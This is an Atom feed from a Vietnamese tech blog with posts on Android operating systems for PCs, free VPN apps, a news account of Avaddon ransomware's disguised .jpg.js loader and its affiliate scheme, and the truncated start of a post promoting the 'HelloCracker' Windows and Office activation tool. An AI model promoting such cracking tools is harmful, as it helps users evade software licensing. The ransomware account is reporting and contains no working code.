<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.0.0">Jekyll</generator><link href="http://localhost:4000/feed.xml" rel="self" type="application/atom+xml" /><link href="http://localhost:4000/" rel="alternate" type="text/html" /><updated>2020-08-03T22:07:21+07:00</updated><id>http://localhost:4000/feed.xml</id><entry><title type="html">Tổng hợp một số Android cho PC hiện nay</title><link href="http://localhost:4000/tong-hop-mot-so-android-cho-hien-nay.html" rel="alternate" type="text/html" title="Tổng hợp một số Android cho PC hiện nay" /><published>2020-08-01T00:00:00+07:00</published><updated>2020-08-01T00:00:00+07:00</updated><id>http://localhost:4000/tong-hop-mot-so-android-cho-pc-hien-nay</id><content type="html" xml:base="http://localhost:4000/tong-hop-mot-so-android-cho-hien-nay.html">&lt;p&gt;Với sự phát triển vượt bậc trong suốt các thập kỷ của khoa học và công nghệ hiện nay, con người gần như tạo nên thành công những vật dụng nhỏ gọn và thông minh tưởng chừng chỉ có trên phim ảnh.&lt;/p&gt;

&lt;p&gt;Đặc biệt nhất kể đến hành trình phát triển của các dòng điện thoại thông minh tiếng anh gọi là &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;smart phone&lt;/code&gt;&lt;/strong&gt;, nó gần như hoàn toàn gom gọn các tính năng tiện ích cần thiết nhất cho con người, từ nghe nhạc đến xem phim và đọc báo lướt web v.v.., cùng với đó thì những chiếc &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;smart phone&lt;/code&gt;&lt;/strong&gt; được trang bị chung một &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;hệ điều hành&lt;/code&gt;&lt;/strong&gt; mở đó là Android. Tuy nhiên với nhu cầu hiện nay là &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;smart phone&lt;/code&gt;&lt;/strong&gt; chưa đủ Adnroid muốn hướng đến một &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;hệ điều hành Android vs hệ sinh thái đồ sộ&lt;/code&gt;&lt;/strong&gt; mang tính mở có thể trải nghiệm được trên cả PC.&lt;/p&gt;

&lt;p&gt;Để có thể đưa Android lên PC, các nhà phát triển đã hướng đến tính giả lập Android cho PC. Tuy nhiên nếu set về phương diện tối ưu phần cứng thì điều này khá là phức tạp khi nó đòi hỏi PC phải có các phần cứng đủ khỏe để có thể giả lập Android một cách ổn định, trong khi đó bản thân phần cứng của những chiếc PC hay Laptop hiện nay đã đủ khỏe để có thể chạy được &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;HDH Windows&lt;/code&gt;&lt;/strong&gt; một cách mượt mà, rồi phải chạy thêm 1 cái giả lập ngốm tài nguyên khác gì bê một hệ điều hành khác vào trong hệ điều hành đang dùng, rồi lại phải chia sẻ thêm phần tài nguyên trong máy tính lên một hệ thống bên trong một hệ điều hành đó ?.&lt;/p&gt;

&lt;p&gt;Vì thế các nhà phát triển đã hướng đến một khả năng đó là mang tính mở với sự vận hành độc lập cho hể điều hành Android này, về cơ bản thì hệ điều hành này cũng được phát triển dựa trên nhân &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;Linux&lt;/code&gt;&lt;/strong&gt; mà thôi, nhưng nói vậy là chưa đủ vì nhu cầu người dùng cộng thêm sự bùng nổ của công nghệ và hệ sinh thái phong phú bên trong Android, chắc hẳn đã có một số ý tưởng của người dùng và nhà phác triển suy nghỉ ra là tại sao không tận dụng nó lên PC ?. Dưới đây là tổng hợp một số Android cho PC :&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.fosshub.com/Remix-OS.html&quot;&gt;&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;1. REMIX OS&lt;/code&gt;&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/202081Android-PC-RemixOS.jpg&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Remix OS mô phỏng hệ điều hành di động Android trên màn hình lớn hơn, có thể kết hợp với chuột và bàn phím mang đến cho bạn những trải nghiệm thú vị. Remix OS cũng là ứng dụng tiên phong về hệ điều hành nhân Android đầu tiên cho PC, được thiết kế với sự đơn giản và nhiều tính năng.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.fosshub.com/Remix-OS.html&quot;&gt;Download Remix OS 3.0&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;http://www.phoenixos.com/en/download_x86&quot;&gt;&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;2. Pheonix OS&lt;/code&gt;&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/202081Android-PC-PheonixOS.jpg&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Phoenix OS trông giống như Remix OS (hiện đã không còn được hỗ trợ). Nó tương thích với GPL-2.0 và cài đặt trên nhiều loại khác nhau của phần cứng dựa trên x86. (Nếu có thể cài đặt Linux trên một máy tính cụ thể, bạn có thể cài đặt Phoenix OS).&lt;/p&gt;

&lt;p&gt;Phoenix OS cũng bao gồm các cải tiến cho Android, chẳng hạn như tự động ngăn không cho ứng dụng chạy dưới nền. Ngoài tốc độ, hệ điều hành cũng nhận được cập nhật thường xuyên. Những tính năng này đã góp phần làm tăng tính phổ biến của nó gần đây. Một vài công ty phần cứng của Trung Quốc sẽ phát hành máy tính bảng và PC mini với việc sử dụng Phoenix OS làm hệ điều hành chính như máy tính bảng Pipo P10 2 trong 1.&lt;/p&gt;

&lt;p&gt;Không phải tất cả phần cứng đều tương thích với Phoenix OS. Nó có cùng một điểm yếu và khuyết điểm như Linux: cụ thể là nó sẽ không hoạt động với tất cả phần cứng. Và ngay cả khi đã hoạt động, nó sẽ thiếu một số tính năng nhất định như âm thanh thông qua một kết nối HDMI.&lt;/p&gt;

&lt;p&gt;Ngoài ra, bạn có thể thử nghiệm Phoenix OS từ bên trong một máy ảo, chẳng hạn như VMware hoặc VirtualBox.&lt;/p&gt;

&lt;p&gt;Yêu cầu cài đặt Phoenix OS
Yêu cầu phần cứng của Phoenix OS
Phoenix OS chỉ yêu cầu bộ vi xử lý Intel hoặc AMD x86 (Intel Atom) và bộ nhớ trong với ít nhất 2GB. Bạn nên sử dụng ít nhất ổ đĩa 16GB. Để cài đặt Phoenix OS, người dùng sẽ cần một ổ USB với ít nhất 8GB bộ nhớ.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;http://www.phoenixos.com/en/download_x86&quot;&gt;Donwload Phoenix OS&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://primeos.in/download/&quot;&gt;&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;3. Prime OS&lt;/code&gt;&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/202081Android-PC-PrimeOS.jpg&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Hệ điều hành PrimeOS cung cấp cho một trải nghiệm máy tính để bàn hoàn chỉnh tương tự như Windows hoặc MacOS với quyền truy cập vào hàng triệu ứng dụng Android. Nó được thiết kế để mang lại cho bạn tốt nhất của cả hai thế giới, một Fusion hoàn toàn của Android và PC.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://primeos.in/download/&quot;&gt;Download Prime OS&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.blissos.org/&quot;&gt;&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;4. Bliss OS&lt;/code&gt;&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/202081Android-PC-BlissOS.jpg&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Một hệ điều hành nguồn mở, dựa trên Android, kết hợp nhiều tối ưu hóa, tính năng và hỗ trợ thiết bị mở rộng. Và nó có sẵn cho chỉ là về bất kỳ Chromebook, Windows/Linux PC hoặc máy tính bảng phát hành trong 4 năm qua.&lt;/p&gt;

&lt;p&gt;Bliss OS cho phép người dùng chọn giữa Desktop hoặc Tablet UI, dựa trên trình khởi chạy đang được sử dụng. Bạn thậm chí có thể pha trộn hai cho một kinh nghiệm thực sự tùy chỉnh.&lt;/p&gt;

&lt;p&gt;Bliss OS đi kèm với một loạt các tính năng bổ sung cho khả năng tương thích với ARM &amp;amp; ARM64 ứng dụng. Cũng như các cấu hình bổ sung cho nhiều gamepads và hồ sơ cho Tincore Keymapper, cho phép người dùng trò chơi như không bao giờ trước.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.blissos.org/&quot;&gt;Download Bliss OS&lt;/a&gt;&lt;/p&gt;

&lt;hr /&gt;

&lt;p&gt;Vừa rồi mình vừa tổng hợp 1 số hệ điều hành Adroid cho PC, bạn cảm thấy thế nào và đã từng trải nghiệm nó chưa vui lòng &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;comment&lt;/code&gt;&lt;/strong&gt; vào bên dưới cho mình biết ý kiến và còn bản Android PC nào mình cho biết đến hãy chia sẻ cho mình biết để mình tổng hợp thêm nhá.&lt;/p&gt;</content><author><name>Panadora</name></author><category term="[&quot;other&quot;, &quot;windows&quot;, &quot;linux&quot;, &quot;news&quot;]" /><summary type="html">Với sự phát triển vượt bậc trong suốt các thập kỷ của khoa học và công nghệ hiện nay...</summary></entry><entry><title type="html">Ransomware RaaS, nguy hiểm với mã độc tống tiền mới</title><link href="http://localhost:4000/ma-doc-tong-tien-RaaS" rel="alternate" type="text/html" title="Ransomware RaaS, nguy hiểm với mã độc tống tiền mới" /><published>2020-06-21T00:00:00+07:00</published><updated>2020-06-21T00:00:00+07:00</updated><id>http://localhost:4000/ma-doc-tong-tien-RaaS</id><content type="html" xml:base="http://localhost:4000/ma-doc-tong-tien-RaaS">&lt;p&gt;&lt;strong&gt;Cách đây 2 ngày tình cơ trên facebook xuất hiện 1 bài đăng nói về sự nguy hiểm của loại mã độc tống tiền mới có tên là RaaS, và tôi cũng đã tò mò với điều và click vào bài post để xem thêm thông tin về con Ransomware mới này. Cụ thể như sau:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/image/ransomware-as-a-service.png&quot; alt=&quot;image-title&quot; width=&quot;100%&quot; /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Loại mã độc Ransomware tốngg tiền mới được phát tán vào đầu tháng 6 này, do một tổ chức chuyên phát triển loại mã độc có tên Avaddon đã được thành lập. Tuy nhiên Avaddon không tự mình phân phối các mã đọc do họ tạo ra, thay vào đó Avaddon tuyển dụng một loại tin tặc và đại lý giúp họ phát tán mã độc.&lt;/p&gt;

&lt;p&gt;Cách làm này giúp mã độc của Avaddon tấn công được cực kỳ nhiều nạn nhân. Đợt tấn công đầu tiên sử dụng mã độc ransomware có tên Avaddon Ransomware đang khiến cả thế giới lo lắng vì quy mô của nó. Với cái nháy mắt và nụ cười, Avaddon Ransomware đang spam, khủng bố hàng trăm ngàn người và rất nhiều trong số đó đã trở thành nạn nhân của Avaddon.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/image/Avaddon-Ransomware-1.jpg&quot; alt=&quot;image-title&quot; width=&quot;100%&quot; /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Một loạt email chứa mã độc với chủ đề gợi sự tò mò như “Ảnh mới của bạn nè?” hoặc “Bạn có thích ảnh của tôi không?”, với nội dung chẳng có gì ngoài biểu tượng nháy mắt hoặc mặt cười đã được gửi đi. Kèm trong thư đương nhiên là trình tải xuống JavaScript mà khi kích vào ransomware sẽ được cài đặt trên máy tính của nạn nhân.&lt;/p&gt;

&lt;p&gt;David Picket, nhà nghiên cứu bảo mật của AppRiver, chia sẻ rằng họ đã chặn 300.000 email chứa Avaddon Ransomware chỉ trong một khoảng thời gian ngắn. Các đại lý, hacker làm việc cho Avaddon bao gồm cả những cái tên sừng sỏ như Phorpiex/Trik Botnet.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/image/Avaddon-Ransomware-2.jpg&quot; alt=&quot;image-title&quot; width=&quot;100%&quot; /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;Thiết lập ảnh phần mở rộng tập tin mặc định của Microsoft vô tình tiếp tay cho Avaddon Ransomware&lt;/code&gt;&lt;/strong&gt;.&lt;br /&gt;
Trình cài đặt JavaScript được đính kèm trong email được ngụy trang giống như một bức ảnh định dạng JPG bằng cách đặt tên là IMG123101.jpg.js. Thiết lập ẩn phần mở rộng tập tin của Windows vô tình tiếp tay cho Avaddon Ransomware. Cụ thể, sau khi tải về máy, IMG123101.jpg.js sẽ chỉ hiển thị là IMG123101.jpg, khiến người dùng lầm tưởng đây chỉ là file ảnh và mở nó ra.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/image/Avaddon-Ransomware-3.jpg&quot; alt=&quot;image-title&quot; width=&quot;100%&quot; /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;Các dòng code &quot;độc hại&quot; ẩn trong IMG123101.jpg.js&lt;/code&gt;&lt;/strong&gt;.&lt;br /&gt;
Khi được mở, IMG123101.jpg.js sẽ khởi chạy cả cửa sổ PowerShell và Bitsadmin để tải về và cài đặt Avaddon Ransomware vào thư mục %Temp%. Ransomware sẽ được khởi chạy ngay sau khi cài đặt xong.&lt;/p&gt;

&lt;p&gt;Trong thử nghiệm được tiến hành bởi Bleeping Computer, sau khi chạy, Avaddon Ransomware sẽ tìm kiếm tất cả các dữ liệu trên máy và mã hóa chúng. Phần mở rộng .avdn sẽ được thêm vào các dữ liệu bị mã hóa.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/image/Avaddon-Ransomware-4.jpg&quot; alt=&quot;image-title&quot; width=&quot;100%&quot; /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;Các tập tin bị mã hóa sau khi Avaddon Ransomware được khởi động&lt;/code&gt;&lt;/strong&gt;.&lt;br /&gt;
Thư đòi tiền chuộc dữ liệu có tên [id]-readme.html cũng được tạo ra trong mỗi thư mục. Trong thư có chứa link tới trang web thanh toán, chỉ có thể truy cập bằng trình duyệt TOR và ID của nạn nhân. Mỗi nạn nhân có một ID riêng, duy nhất.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/image/Avaddon-Ransomware-5-1.jpg&quot; alt=&quot;image-title&quot; width=&quot;100%&quot; /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;Thư đòi tiền chuộc của Avaddon, yêu cầu người dùng tải trình duyệt TOR để truy cập trang thanh toán&lt;/code&gt;&lt;/strong&gt;.&lt;br /&gt;
Khi truy cập trang web thanh toán, nạn nhân sẽ thấy số tiền mà Avaddon yêu cầu là 900 USD, có thể tăng thêm tùy theo số lượng tài liệu. Hướng dẫn chi tiết về cách thanh toán để nhận trình giải mã cũng được Avaddon liệt kê chi tiết.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/image/Avaddon-Ransomware-6.jpg&quot; alt=&quot;image-title&quot; width=&quot;100%&quot; /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;Giá tiền chuộc dữ liệu là 900 USD, có thể tăng thêm tùy theo số lượng tài liệu&lt;/code&gt;&lt;/strong&gt;.&lt;br /&gt;
Trang web cũng có đầy đủ các phần như hỗ trợ qua tin nhắn, giải mã thử miễn phí và trang trợ giúp vui nhộn với hình ảnh các nhân vật trong Harry Potter. Không may là sau khi tiến hành phân tích Avaddon Ransomware, Michael Gillespie kết luận rằng trình giải mã thử miễn phí không hoạt động. Gillespie là người tạo ra trang xác định ransomware ID-Ransomware.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/image/Avaddon-Ransomware-7.jpg&quot; alt=&quot;image-title&quot; width=&quot;100%&quot; /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;Trang hỗ trợ đầy hài hước của Avaddon&lt;/code&gt;&lt;/strong&gt;.&lt;br /&gt;
Phân phối ransomware theo hình thức đại lý liên kết&lt;/p&gt;

&lt;p&gt;Trong quảng cáo đăng trên một diễn đàn hacker của Nga, Avaddon tuyên bố rằng họ vận hành theo phương thức Ransomware-as-an-Affiliate (RaaS). Đây là phương thức hoàn toàn mới trong thế giới tội phạm mạng.&lt;/p&gt;

&lt;p&gt;RaaS hoạt động giống như một hệ thống kinh doanh liên kết, trong đó Avaddon chịu trách nhiệm phát triển mã độc và vận hành, xử lý quá trình thanh toán, giải mã cho nạn nhân. Các hacker và đại lý liên kết với Avaddon sẽ đảm nhiệm việc phân phối ransomware qua thư rác, xâm nhập mạng lưới nội bộ và các phương thức khác.&lt;/p&gt;

&lt;p&gt;Nếu nạn nhân chi tiền chuộc lại dữ liệu, Avaddon sẽ trả 65% cho đại lý, giữ lại 35%. Các đại lý lớn có thể đàm phán với Avaddon để nhận mức doanh thu cao hơn, tùy theo quy mô của cuộc tấn công.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/image/Avaddon-Ransomware-8.jpg&quot; alt=&quot;image-title&quot; width=&quot;100%&quot; /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;Avaddon đang rất tích cực tìm kiếm đại lý&lt;/code&gt;&lt;/strong&gt;.&lt;br /&gt;
Tuy nhiên, các đại lý tham gia RaaS sẽ phải tuân theo một loạt quy định mà Avaddon đưa ra. Quy tắc quan trọng nhất mà Avaddon đưa ra đó là các đại lý không được tấn công nạn nhân tại các quốc gia trong Cộng đồng các Quốc gia Độc lập (CIS).&lt;/p&gt;

&lt;p&gt;Hiện tại, Avaddon vẫn đang tích cực tuyển dụng thêm hacker và các đại lý. Vì thế, trong tương lai sẽ còn có thêm nhiều đợt tấn công với quy mô lớn của Avaddon Ransomware. Mời các bạn truy cập trang bên dưới để tham khảo cách bảo vệ dữ liệu trước các ransomware nguy hiểm.&lt;/p&gt;

&lt;hr /&gt;

&lt;p&gt;Dựa theo nguồn thông tin từ: &lt;a href=&quot;https://quantrimang.com/ransomware-nguy-hiem-nay-dang-phat-tan-nhanh-tren-toan-the-gioi-172808&quot;&gt;Quản Trị Mạng&lt;/a&gt;&lt;/p&gt;</content><author><name>Panadora</name></author><category term="[&quot;other&quot;, &quot;windows&quot;, &quot;linux&quot;, &quot;news&quot;]" /><summary type="html">Loại mã độc Ransomware tốngg tiền mới được phát tán vào đầu tháng 6 này, do một tổ chức chuyên phát triển loại mã độc có tên Avaddon đã được thành lập.</summary></entry><entry><title type="html">Tổng hợp một số phần mềm VPN miễn phí</title><link href="http://localhost:4000/tong-hop-nhung-phan-mem-vpn-mien-phi.html" rel="alternate" type="text/html" title="Tổng hợp một số phần mềm VPN miễn phí" /><published>2020-06-02T00:00:00+07:00</published><updated>2020-06-02T00:00:00+07:00</updated><id>http://localhost:4000/tong-hop-nhung-phan-mem-vpn-mien-phi</id><content type="html" xml:base="http://localhost:4000/tong-hop-nhung-phan-mem-vpn-mien-phi.html">&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; width=&quot;500&quot; src=&quot;/image/202061vpn.jpg&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;VPN là gì ?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;VPN là tên gọi tắt của &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;Virtual Private Network&lt;/code&gt;&lt;/strong&gt;, là một phần mềm công nghệ mạng ảo giúp tạo kết nối mạng an toàn khi tham gia vào mạng công cộng như &lt;strong&gt;Internet&lt;/strong&gt; hoặc mạng riêng do một nhà cung cấp dịch vụ sở hữu. Các tập đoàn lớn các cơ quan chính phủ sử dụng công nghệ VPN cho phép người dùng từ xa kết nối an toàn đến mạng cơ quan mình. &lt;a href=&quot;https://quantrimang.com/ly-thuyet-vpn-la-gi-117232&quot;&gt;chi tiết…&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tổng hợp một số phần mềm VPN miễn phí&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://www.vpngate.net/en/download.aspx&quot;&gt;1. Vpn Gate Client&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Đơn giản chỉ cần cài đặt VPN Gate Client plugin để SoftEther VPN Client. Nó sẽ cho phép bạn kết nối với bất kỳ VPN công cộng Relay máy chủ của VPN Gate trong một snap. Nó có một thông lượng tốt hơn so với L2TP, OpenVPN hoặc SSTP. Tệp chương trình này được ký điện tử bằng chứng chỉ do GlobalSign phát hành. Tệp nhị phân có một countersignature do Symantec phát hành.&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/vpngateclient.png&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://touchvpn.net/&quot;&gt;2. Touch VPN&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Truy cập bất kỳ trang web nào ở bất kỳ quốc gia nào
Bypass Geo-hạn chế để mở khóa bất kỳ trang web bất cứ nơi nào bạn! Nhận quyền truy cập vào các trang web bị chặn hoặc kiểm duyệt bởi chính phủ, trường học hoặc nơi làm việc. Evade tường lửa để mở khóa Facebook, xem YouTube, và phá vỡ các giới hạn VOIP. TouchVPN bỏ chặn nó tất cả với ứng dụng VPN miễn phí của nó&lt;/p&gt;

&lt;p&gt;Bảo vệ dữ liệu của bạn khỏi hacker
bạn đang kết nối với một Hotspot WiFi công cộng, một hacker có thể truy cập tên, mật khẩu và thông tin cá nhân của bạn. TouchVPN mã hóa dữ liệu của bạn và cung cấp cho bạn bảo mật cấp ngân hàng để bảo vệ tốt nhất trong khi bạn kết nối với một điểm truy cập WiFi không an toàn.&lt;/p&gt;

&lt;p&gt;Lướt web ẩn danh
Tránh bị snooped bởi ISP của bạn và ngăn chặn các trang web từ theo dõi quảng cáo và nhắm mục tiêu. TouchVPN thay đổi địa chỉ IP của bạn, vì vậy danh tính trực tuyến của bạn là vô danh và hoạt động Internet của bạn là không thể tiếp cận với con mắt tò mò và businessnes.&lt;/p&gt;

&lt;p&gt;Hiện tại &lt;code class=&quot;highlighter-rouge&quot;&gt;Touch VPN&lt;/code&gt; được tích hợp trong app store của Microsoft bạn cũng có thể vào đó &lt;strong&gt;&lt;a href=&quot;https://www.microsoft.com/store/productId/9NBLGGH5GB3F&quot;&gt;tải về&lt;/a&gt;&lt;/strong&gt;, và cũng đã có phiên bản &lt;strong&gt;&lt;a href=&quot;https://play.google.com/store/apps/details?id=com.northghost.touchvpn&quot;&gt;CHPlay&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/TouchVPN.jpg&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://1.1.1.1/&quot;&gt;3. VPN 1.1.1.1&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Cũng là 1 phần mềm VPN được sử dụng phổ biến nhất tại thời điểm bây giờ. Tại sao lại phổ biến thì tất nhiên là đối với các bạn nam đang còn F.A hay đại loại là ở nhà một mình :) hihi bạn hiểu ý tôi muốn về chủ đề gì rồi chứ.&lt;/p&gt;

&lt;p&gt;Tuy nhiên phần mềm này đang được hổ trợ trên Android và IOS, hiện tại nhà phát hành chưa có thông báo về phiên bản dành cho Windows và MacOs. để có thể download và hướng dẫn cài đặt sử dụng trên Windows thì mời các bạn liên kết tới &lt;a href=&quot;https://congnghevacuocsong.tk/huong-d-n-cai-dat-warp-1-1-1-1-tren-pc-windows-va-mac-os.html&quot;&gt;bài hướng dẫn này&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://play.google.com/store/apps/details?id=com.cloudflare.onedotonedotonedotone&quot;&gt;Tải về cho Android&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;a href=&quot;https://apps.apple.com/us/app/1-1-1-1-faster-internet/id1423538627&quot;&gt;Tải về cho IOS&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/1111vpn.jpg&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://www.tunnelbear.com/&quot;&gt;4. TunnelBear&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;TunnelBear là phần mềm VPN miễn phí và giao diện thân thiện với người dùng. Bạn có thể tùy chọn đăng ký miễn phí hoặc trả phí. Hạn chế duy nhất với bản miễn phí là bạn chỉ có 500MB lưu lượng truy cập mỗi tháng.&lt;/p&gt;

&lt;p&gt;Phần mềm này là hiệu suất ấn tượng và dễ sử dụng. Bạn sẽ không cần phải thay đổi bất kỳ cài đặt mặc định nào và tùy chọn kết nối tự động vẫn hoạt động tốt, nhưng bạn có thể chọn thủ công một trong 20 quốc gia theo vị trí được chấp nhận. Đơn giản và đảm bảo an toàn, TunnelBear chắc chắn là một trong những VPN miễn phí tốt nhất cho tất cả các thiết bị của bạn.&lt;/p&gt;

&lt;p&gt;Một điều lưu ý rằng TunnelBear đã điều chỉnh chính sách bảo mật của mình, do đó, VPN hiện thu thập ít dữ liệu hơn về người dùng, bỏ phần cung cấp tên đăng ký và “đào bới” về hồ sơ số lượng kết nối suốt đời của người dùng.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://www.tunnelbear.com/apps/windows&quot;&gt;Tải về Windows&lt;/a&gt; - &lt;a href=&quot;https://www.tunnelbear.com/apps/mac&quot;&gt;Tải về MacOS&lt;/a&gt; - &lt;a href=&quot;https://www.tunnelbear.com/apps/ios&quot;&gt;Tải về IOS&lt;/a&gt; - &lt;a href=&quot;https://www.tunnelbear.com/apps/android&quot;&gt;Tải về Android&lt;/a&gt; - &lt;a href=&quot;https://www.tunnelbear.com/apps/browser&quot;&gt;Tải về Browser&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/TunnelBear.jpg&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lời kết&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Vừa rồi là mình tổng hợp một số VPN được sử dụng hiện nay, các bạn đã từng sử dụng qua những phần mềm trên chưa hãy cho mình biết ý kiến sử dụng của các bạn, và còn những phần mềm nào hữu ích hay comment cho mình biết để mình có thể tham khảo và tiềm hiểu nhá, cảm ơn các bạn đã xem qua đừng quên like và share cho bạn bè cùng biết đến nhá.&lt;/p&gt;

&lt;hr /&gt;</content><author><name>Panadora</name></author><category term="[&quot;other&quot;, &quot;windows&quot;]" /><summary type="html">Trong vài năm qua, bạn có thể đã nghe người ta nói nhiều về HTML5...</summary></entry><entry><title type="html">Kích hoạt Windows 10 và Microsoft Office bằng phần mềm HelloCracker</title><link href="http://localhost:4000/kich-hoat-windows-va-microsoft-office-voi-hello-cracker.html" rel="alternate" type="text/html" title="Kích hoạt Windows 10 và Microsoft Office bằng phần mềm HelloCracker" /><published>2020-06-01T00:00:00+07:00</published><updated>2020-06-01T00:00:00+07:00</updated><id>http://localhost:4000/kich-hoat-windows-va-microsoft-office-voi-hello-cracker</id><content type="html" xml:base="http://localhost:4000/kich-hoat-windows-va-microsoft-office-voi-hello-cracker.html">&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; width=&quot;500&quot; src=&quot;/image/202061Hellocracker.PNG&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;
&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;HelloCraker&lt;/code&gt;&lt;/strong&gt; là phần mềm được lập trình bằng ngôn ngữ C# , phần mềm giúp cho việc thao tác kích hoạt key windows một cách đơn giản. Cụ thể phần mềm đã có sẵn những bản key kích hoạt 365 ngày cho từng phiên bản của Windows 10 và Microsoft Office.&lt;/p&gt;

